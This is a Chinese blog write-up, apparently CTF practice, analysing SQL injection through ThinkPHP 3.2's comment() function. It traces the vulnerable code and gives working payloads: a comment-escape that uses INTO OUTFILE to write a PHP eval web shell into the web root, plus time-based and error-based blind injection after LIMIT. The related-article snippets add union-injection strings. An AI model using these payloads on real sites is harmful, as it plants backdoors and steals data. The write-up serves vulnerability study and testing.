ThinkPHP v3.2 comment 注释注入 写shell

最新推荐文章于 2024-05-17 08:26:16 发布
最新推荐文章于 2024-05-17 08:26:16 发布
阅读量318 收藏
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53263789/article/details/122396706
版权

漏洞详情

comment函数是用来进行查询注释功能,当执行sql语句时,搭配comment可能存在利用注释进行写shell或者时间盲注

漏洞复现

控制器写入demo

$user = M('Users')->comment($id)->find(intval($id));

payload

?id=1*/ into outfile "/var/www/html/3.php" LINES STARTING BY '<?php eval($_POST[0]);?>'/*

漏洞分析

首先看一下函数调用栈


开始跟进调试

跟进comment函数

给$options加上comment就是我们传入的东西

中间过程同thinkphp 3.2.3find 注入过程分析相同,往下走到这里select方法

跟进,对$options中的model和bind进行操作,不影响

跟进buildSelectSql()开始构建sql语句

跟进parseSql()
分析$options中的comment

跟进

我们传入的comment被加入到注释中,可以通过闭合前后注释进行注入

先尝试一下

构造的sql语句注入点在LIMIT 1 后面的地方,也就是说

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT [注入点]

那么怎么利用这一点?

堆叠时间盲注

本地测试可以尝试堆叠注入方式来进行时间盲注

1*/;select if(substr(database(),1,1)='s',sleep(3),0)/*


ctfshow 题目环境下

LIMIT后 注入方法

Mysql下Limit注入方法 | 离别歌 (leavesongs.com)

Mysql注入点在limit关键字后面的利用方法 - 那天ws

此方法适用于MySQL 5.x中,在 limit语句后面的注入

首先查看 select 用法

SELECT
    [ALL | DISTINCT | DISTINCTROW ]
      [HIGH_PRIORITY]
      [STRAIGHT_JOIN]
      [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
      [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
    select_expr [, select_expr ...]
    [FROM table_references
    [WHERE where_condition]
    [GROUP BY {col_name | expr | position}
      [ASC | DESC], ... [WITH ROLLUP]]
    [HAVING where_condition]
    [ORDER BY {col_name | expr | position}
      [ASC | DESC], ...]
    [LIMIT {[offset,] row_count | row_count OFFSET offset}]   //这里
    [PROCEDURE procedure_name(argument_list)]
    [INTO OUTFILE 'file_name' export_options
      | INTO DUMPFILE 'file_name'
      | INTO var_name [, var_name]]
    [FOR UPDATE | LOCK IN SHARE MODE]]

根据文章 有 两种方式
limit 关键字后面还有 PROCEDUREINTO 关键字,INTO 关键字在有写权限可以用来写文件,这里看一下 PROCEDURE 关键字.MySQL默认可用的存储过程只有 ANALYSE (doc)

PROCEDURE

报错注入,payload

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
 
ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

时间盲注

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

INTO

尝试利用 into outfile 写shell 虽然dumpfile也可以写文件但是因为 dumpfile 后面没有附加参数(export_options) 这点是 into outfile 利用的关键

看一下后面的参数

SELECT ... INTO OUTFILE 'file_name'
        [CHARACTER SET charset_name]
        [export_options]

export_options:
    [{FIELDS | COLUMNS}
        [TERMINATED BY 'string']//分隔符
        [[OPTIONALLY] ENCLOSED BY 'char']
        [ESCAPED BY 'char']
    ]
    [LINES
        [STARTING BY 'string']
        [TERMINATED BY 'string']
    ]

OPTION 参数为可选参数选项,其可能的取值有:

`FIELDS TERMINATED BY '字符串'`:设置字符串为字段之间的分隔符,可以为单个或多个字符。默认值是“\t”。

`FIELDS ENCLOSED BY '字符'`:设置字符来括住字段的值,只能为单个字符。默认情况下不使用任何符号。

`FIELDS OPTIONALLY ENCLOSED BY '字符'`:设置字符来括住CHAR、VARCHAR和TEXT等字符型字段。默认情况下不使用任何符号。

`FIELDS ESCAPED BY '字符'`:设置转义字符,只能为单个字符。默认值为“\”。

`LINES STARTING BY '字符串'`:设置每行数据开头的字符,可以为单个或多个字符。默认情况下不使用任何字符。

`LINES TERMINATED BY '字符串'`:设置每行数据结尾的字符,可以为单个或多个字符。默认值是“\n”。

给出payload

/?id=1*/ into outfile "/var/www/html/3.php" LINES STARTING BY '<?php eval($_POST[0]);?>'/*

Ff.cheng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL手工注入、mysqlshell复习
叶子的Blog
01-06 1180
、Mysql 手工注入 1.1 联合注入 ?id=1' order by 4--+ ?id=0' union select 1,2,3,database()--+ ?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+ ?id=0' union select 1,2,3,group_concat(column_name) fro
shell 脚本中的注释详解
usstmiracle的博客
10-28 6760
逗号一般作区分内容,也可以用作注释,常用用法:开始注释部分:输入:: ' 结束部分:' (注意,逗号和冒号之间要加空格)eof截止符不但可以用作后续输入命令,还可以用作注释,常用用法:开始注释部分:输入::
sqlshell原理_sql注入shell的条件
最新发布
2401_84281655的博客
05-17 725
1. 知晓网站的绝对路径原因是因为在指定--os-shell参数时,期间会让你输入要入木马的web路径,不然蚁剑如何连接获取方式有:(1)网页报错信息 (2)phpinfo等探针信息 (3)猜测常见web目录2. 对web目录有可权限即secure_file_priv = ''配置为空原因是--os-shell参数shell使用的是select xx into outfile而secure_file_priv此配置。
PHP DOC类型注释的用法
gc1108960的专栏
03-31 797
/*** @name 名字* @abstract 申明变量/类/方法* @access 指明这个变量、类、函数/方法的存取权限* @author 函数作者的名字和邮箱地址* @category 组织packages* @copyright 指明版权信息* @const 指明常量* @deprecate 指明不推荐或者是废弃的信息* @example 示例*
xman_2019_nooocall(pwn里基于时间的盲注)
seaaseesa的博客
04-30 682
xman_2019_nooocall 首先,检查一下程序的保护机制 沙箱机制禁用了所有的系统调用 然后,我们用IDA分析一下,我们可以输入并执行16字节shellcode。然后问题在于系统调用全部被禁用。 程序一开始的时候使用了fopen打开了flag,并且将flag读取到了内存里。然后,当执行shellcode的时候,我们发现,栈里有FILE结构体的地址。 FILE...
[框架漏洞]Thinkphp系列漏洞【截至2020-07-20】
不忘初心,护天下安全!
07-21 8976
一、Thinkphp ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,因为受到众多开发人员的喜爱,其在市场的应用规模很大,自然也引起了众多安全人员的注意。因此在这里,对相关漏洞进行归纳和总结。 指纹为:X-Powered-By: ThinkPHP 二、安全漏洞 1.ThinkPHP 5.0.23远程代码执行 参考:http://zone.secevery.com/article/1165 介绍:Thinkphp在实现框架中的核心类Request的method方法实现了表单请求
基于ThinkPHP V3.2开发的面向API的后台管理系统
02-08
《基于ThinkPHP V3.2开发的面向API的后台管理系统详解》 在信息化时代,后台管理系统作为企业数据处理的核心,其重要性不言而喻。本文将深入探讨一个基于ThinkPHP V3.2框架构建的面向API的后台管理系统,旨在为...
ThinkPHP v3.2.X(SQL注入&文件读取)反序列化POP链1
08-03
ThinkPHP v3.2.X 反序列化漏洞与SQL注入及文件读取利用分析》 ThinkPHP是一款广泛使用的PHP框架,其3.2.*版本存在反序列化漏洞,允许攻击者通过精心构造的数据包触发特定行为,如SQL注入和文件读取。本文将深入...
ThinkPHP_3.2.zip_thinkPHP3.2_thinkphp3.2..3
09-14
《深入理解ThinkPHP3.2框架》 ThinkPHP,作为国内广泛应用的PHP开发框架,以其简洁、高效和易用性赢得了开发者们的喜爱。本篇将详细介绍ThinkPHP3.2版本,该版本在2013年12月31日进行了更新,其环境要求为PHP5.3及...
Thinkphp3.2开发的API后台管理系统.zip
02-25
《基于Thinkphp3.2的API后台管理系统详解》 在当今互联网时代,API(Application Programming Interface)已经成为构建高效、可扩展应用的关键。Thinkphp3.2作为一款深受开发者喜爱的PHP框架,以其轻量级、易用性...
thinkPHP3.2使用RBAC实现权限管理的实现
10-16
主要介绍了thinkPHP3.2使用RBAC实现权限管理的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
python3编ThinkPHP命令执行Getshell的方法
09-19
主要介绍了python3编ThinkPHP命令执行Getshell的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
[网鼎杯 2018]Comment 注入读取文件load_file
qq_54929891的博客
04-01 1485
记录一下做这道题的经历和思路 发帖的时候要进行账号登陆,里面暗示了账号以及部分密码,后面的三个***我们采用爆破来进行
SQL二阶注入shell问题——Joomla3.8.2漏洞为例
publicStr的博客
05-10 1247
开始前的例行叨叨:参考大佬文章 http://www.sohu.com/a/223945381_354899发现仅到报错注入一步就没了下文,记录一下最终马的姿势。复现过程:Joomla官网特别良心,各种历史版本随便下载由于复现CVE-2018-6376漏洞,所以下载了3.8.2版本,一路安装好。由于注入点在用户后台,改资料时,复现必须允许用户注册,而且能进自己后台。所以网站建好先用admin账户...
ThinkPHP3.2 comment 注释注入shell
Sentiment的博客
05-21 1658
comment 先看下comment的用法,用于在生成的SQL语句中添加注释内容,例如: $this->comment('查询考试前十名分数') ->field('username,score') ->limit(10) ->order('score desc') ->select(); 最终生成的SQL语句是: SELECT username,score FROM think_score ORDER BY score desc LIMIT 10 /* 查询考试前十名分数 *
【漏洞复现】ThinkPHP5.x远程代码执行
Kris__zhang的博客
04-23 476
一、漏洞描述 2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞: https://blog.thinkphp.cn/869075 漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。 二、漏洞影响版本 Thinkphp 5.x-Thinkphp 5.1.31 Thinkphp 5.0.x<=5.0.23 三、漏洞复现 1、官网下载Thinkphp 5
thinkphp 6 生成模型 property 注释
fly
04-05 710
php think make:command dbinfo dbinfo <?php declare (strict_types = 1); namespace app\command; use think\console\Command; use think\console\Input; // use think\console\input\Argument; use think\console\input\Option; use think\console\Output; class .
model注释php,基于thinkphp的模型文件自动注释生成器
weixin_29752389的博客
03-10 727
thinkphp 一个模型对应一个数据表,所以数据表里面字段也是模型的一些属性,但是因为php是动态语言,模型里面的属性并不能直观的看到,出了数据表里面的字段以外的属性,模型其实还包含了通过getXXXAttr方法定义的属性,还有关联关系定义的属性比如hasOne,hasMany等等。虽然thinkphp支持了通过访问数组的形式访问模型的属性,但是还是不直观,另一个是不知道模型属性的字段含义,如果...
ThinkPHP 5.0 get SHELL
q412539429的博客
02-19 967
Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f 路由信息中controller的部分进行了过滤,可知问题出现在路由调度时 关键代码: 在修复之前程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。 1.利用sys...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值